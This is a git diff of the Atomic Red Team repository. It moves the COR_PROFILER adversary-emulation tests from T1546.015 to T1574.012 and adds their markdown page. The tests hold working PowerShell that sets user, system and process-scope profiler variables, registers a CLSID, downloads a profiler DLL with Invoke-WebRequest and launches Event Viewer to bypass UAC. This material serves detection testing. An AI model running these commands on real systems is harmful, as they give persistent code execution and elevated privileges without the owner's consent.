-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
-      executor:
-        command: |
-          Write-Host "Creating system environment variables" -ForegroundColor Cyan
-          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
-          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
-          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
-        cleanup_command: |
-          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
-          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
-          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
-        name: powershell
-        elevation_required: true
-    - name: COM Hijack Leveraging registry-free process scope COR_PROFILER
-      auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817
-      description: 'Creates process scope environment variables to enable a .NET profiler
-        (COR_PROFILER) without making changes to the registry. The unmanaged profiler
-        DLL (`atomicNotepad.dll`) executes when the CLR is loaded by PowerShell.
-
-'
-      supported_platforms:
-      - windows
-      input_arguments:
-        file_name:
-          description: unamanged profiler DLL
-          type: Path
-          default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
-        clsid_guid:
-          description: custom clsid guid
-          type: String
-          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
-      dependency_executor_name: powershell
-      dependencies:
-      - description: "#{file_name} must be present\n"
-        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
-      executor:
-        command: |
-          $env:COR_ENABLE_PROFILING = 1
-          $env:COR_PROFILER = '#{clsid_guid}'
-          $env:COR_PROFILER_PATH = '#{file_name}'
-          POWERSHELL -c 'Start-Sleep 1'
-        cleanup_command: |
-          $env:COR_ENABLE_PROFILING = 0
-          $env:COR_PROFILER = ''
-          $env:COR_PROFILER_PATH = ''
-        name: powershell
+    atomic_tests: []
   T1134.002:
     technique:
       external_references:
@@ -9890,7 +9893,132 @@ persistence:
       - Jesse Brown, Red Canary
       x_mitre_platforms:
       - Windows
-    atomic_tests: []
+      identifier: T1574.012
+    atomic_tests:
+    - name: User scope COR_PROFILER
+      auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
+      description: |
+        Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
+        The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.
+        Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
+        If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
+        the notepad process will not execute with high integrity.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unmanaged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
+          New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+          Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
+          START MMC.EXE EVENTVWR.MSC
+        cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\"
+          -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment
+          -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty
+          -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore
+          | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\"
+          -Force -ErrorAction Ignore | Out-Null\n"
+        name: powershell
+    - name: System Scope COR_PROFILER
+      auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310
+      description: |
+        Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
+        The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
+        level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
+        still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unmanaged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          Write-Host "Creating system environment variables" -ForegroundColor Cyan
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+        cleanup_command: |
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
+        name: powershell
+        elevation_required: true
+    - name: Registry-free process scope COR_PROFILER
+      auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817
+      description: |
+        Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unamanged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          $env:COR_ENABLE_PROFILING = 1
+          $env:COR_PROFILER = '#{clsid_guid}'
+          $env:COR_PROFILER_PATH = '#{file_name}'
+          POWERSHELL -c 'Start-Sleep 1'
+        cleanup_command: |
+          $env:COR_ENABLE_PROFILING = 0
+          $env:COR_PROFILER = ''
+          $env:COR_PROFILER_PATH = ''
+        name: powershell
   T1546.001:
     technique:
       created: '2020-01-24T13:40:47.282Z'
@@ -10248,129 +10376,7 @@ persistence:
       - Elastic
       x_mitre_platforms:
       - Windows
-      identifier: T1546.015
-    atomic_tests:
-    - name: COM Hijack Leveraging user scope COR_PROFILER
-      auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
-      description: |
-        Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
-        The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by the Event Viewer process.
-        Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
-        If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
-        the notepad process will not execute with high integrity.
-      supported_platforms:
-      - windows
-      input_arguments:
-        file_name:
-          description: unmanaged profiler DLL
-          type: Path
-          default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
-        clsid_guid:
-          description: custom clsid guid
-          type: String
-          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
-      dependency_executor_name: powershell
-      dependencies:
-      - description: "#{file_name} must be present\n"
-        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
-      executor:
-        command: |
-          Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
-          New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
-          New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
-          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
-          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
-          Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
-          START MMC.EXE EVENTVWR.MSC
-        cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\"
-          -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment
-          -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty
-          -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore
-          | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\"
-          -Force -ErrorAction Ignore | Out-Null\n"
-        name: powershell
-    - name: COM Hijack Leveraging System Scope COR_PROFILER
-      auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310
-      description: |
-        Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
-        The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
-        level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
-        still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
-      supported_platforms:
-      - windows
-      input_arguments:
-        file_name:
-          description: unmanaged profiler DLL
-          type: Path
-          default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
-        clsid_guid:
-          description: custom clsid guid
-          type: String
-          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
-      dependency_executor_name: powershell
-      dependencies:
-      - description: "#{file_name} must be present\n"
-        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
-      executor:
-        command: |
-          Write-Host "Creating system environment variables" -ForegroundColor Cyan
-          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
-          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
-          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
-        cleanup_command: |
-          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
-          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
-          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
-        name: powershell
-        elevation_required: true
-    - name: COM Hijack Leveraging registry-free process scope COR_PROFILER
-      auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817
-      description: 'Creates process scope environment variables to enable a .NET profiler
-        (COR_PROFILER) without making changes to the registry. The unmanaged profiler
-        DLL (`atomicNotepad.dll`) executes when the CLR is loaded by PowerShell.
-
-'
-      supported_platforms:
-      - windows
-      input_arguments:
-        file_name:
-          description: unamanged profiler DLL
-          type: Path
-          default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
-        clsid_guid:
-          description: custom clsid guid
-          type: String
-          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
-      dependency_executor_name: powershell
-      dependencies:
-      - description: "#{file_name} must be present\n"
-        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
-      executor:
-        command: |
-          $env:COR_ENABLE_PROFILING = 1
-          $env:COR_PROFILER = '#{clsid_guid}'
-          $env:COR_PROFILER_PATH = '#{file_name}'
-          POWERSHELL -c 'Start-Sleep 1'
-        cleanup_command: |
-          $env:COR_ENABLE_PROFILING = 0
-          $env:COR_PROFILER = ''
-          $env:COR_PROFILER_PATH = ''
-        name: powershell
+    atomic_tests: []
   T1554:
     technique:
       id: attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5
@@ -22038,7 +22044,132 @@ defense-evasion:
       - Jesse Brown, Red Canary
       x_mitre_platforms:
       - Windows
-    atomic_tests: []
+      identifier: T1574.012
+    atomic_tests:
+    - name: User scope COR_PROFILER
+      auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
+      description: |
+        Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
+        The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.
+        Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
+        If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
+        the notepad process will not execute with high integrity.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unmanaged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
+          New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+          Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
+          START MMC.EXE EVENTVWR.MSC
+        cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\"
+          -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment
+          -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty
+          -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore
+          | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\"
+          -Force -ErrorAction Ignore | Out-Null\n"
+        name: powershell
+    - name: System Scope COR_PROFILER
+      auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310
+      description: |
+        Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
+        The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
+        level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
+        still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unmanaged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          Write-Host "Creating system environment variables" -ForegroundColor Cyan
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+        cleanup_command: |
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
+        name: powershell
+        elevation_required: true
+    - name: Registry-free process scope COR_PROFILER
+      auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817
+      description: |
+        Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unamanged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          $env:COR_ENABLE_PROFILING = 1
+          $env:COR_PROFILER = '#{clsid_guid}'
+          $env:COR_PROFILER_PATH = '#{file_name}'
+          POWERSHELL -c 'Start-Sleep 1'
+        cleanup_command: |
+          $env:COR_ENABLE_PROFILING = 0
+          $env:COR_PROFILER = ''
+          $env:COR_PROFILER_PATH = ''
+        name: powershell
   T1070.003:
     technique:
       external_references:
diff --git a/atomics/T1574.012/T1574.012.md b/atomics/T1574.012/T1574.012.md
new file mode 100644
index 00000000..d04da030
--- /dev/null
+++ b/atomics/T1574.012/T1574.012.md
@@ -0,0 +1,190 @@
+# T1574.012 - COR_PROFILER
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1574.012)
+<blockquote>Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
+
+The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
+
+Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - User scope COR_PROFILER](#atomic-test-1---user-scope-cor_profiler)
+
+- [Atomic Test #2 - System Scope COR_PROFILER](#atomic-test-2---system-scope-cor_profiler)
+
+- [Atomic Test #3 - Registry-free process scope COR_PROFILER](#atomic-test-3---registry-free-process-scope-cor_profiler)
+
+
+<br/>
+
+## Atomic Test #1 - User scope COR_PROFILER
+Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
+The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.
+Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
+If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
+the notepad process will not execute with high integrity.
+
+Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder&#92;T1574.012&#92;bin&#92;T1574.012x64.dll|
+| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
+New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
+New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
+START MMC.EXE EVENTVWR.MSC
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force -ErrorAction Ignore 
+Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
+Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
+Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: #{file_name} must be present
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_name}) {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - System Scope COR_PROFILER
+Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
+The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
+level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
+still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
+
+Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder&#92;T1574.012&#92;bin&#92;T1574.012x64.dll|
+| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Write-Host "Creating system environment variables" -ForegroundColor Cyan
+New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
